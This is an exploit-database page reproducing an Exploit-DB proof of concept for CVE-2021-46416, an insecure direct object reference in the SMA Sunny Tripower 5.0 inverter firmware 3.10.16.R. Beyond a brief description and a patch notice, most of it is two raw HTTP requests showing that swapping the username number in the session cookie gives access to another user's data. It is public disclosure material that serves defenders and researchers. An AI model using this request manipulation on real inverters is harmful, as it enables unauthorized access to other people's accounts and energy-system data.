header-logo
Suggest Exploit
vendor:
SUNNY TRIPOWER 5.0
by:
Momen Eldawakhly (Cyber Guy)
8.1
CVSS
HIGH
Insecure Direct Object Reference (IDOR)
639
CWE
Product Name: SUNNY TRIPOWER 5.0
Affected Version From: 3.10.16.R
Affected Version To: 3.10.16.R
Patch Exists: YES
Related CWE: CVE-2021-46416
CPE: a:sma_solar_technology:sunny_tripower_5.0
Metasploit:
Other Scripts:
Platforms Tested: Linux [Firefox]
2022

SAM SUNNY TRIPOWER 5.0 – Insecure Direct Object Reference (IDOR)

An Insecure Direct Object Reference (IDOR) vulnerability exists in SAM SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R, which allows an attacker to access unauthorized data by manipulating the username parameter in the request. This can be exploited by sending a specially crafted request with a manipulated username parameter to the vulnerable application.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the firmware to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.sma.de
# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46416

# Proof of Concept

============[ Normal user request ]============

GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1

============[ Manipulated username request ]============

GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1

Navigation

Suggest Exploit

Services By CQR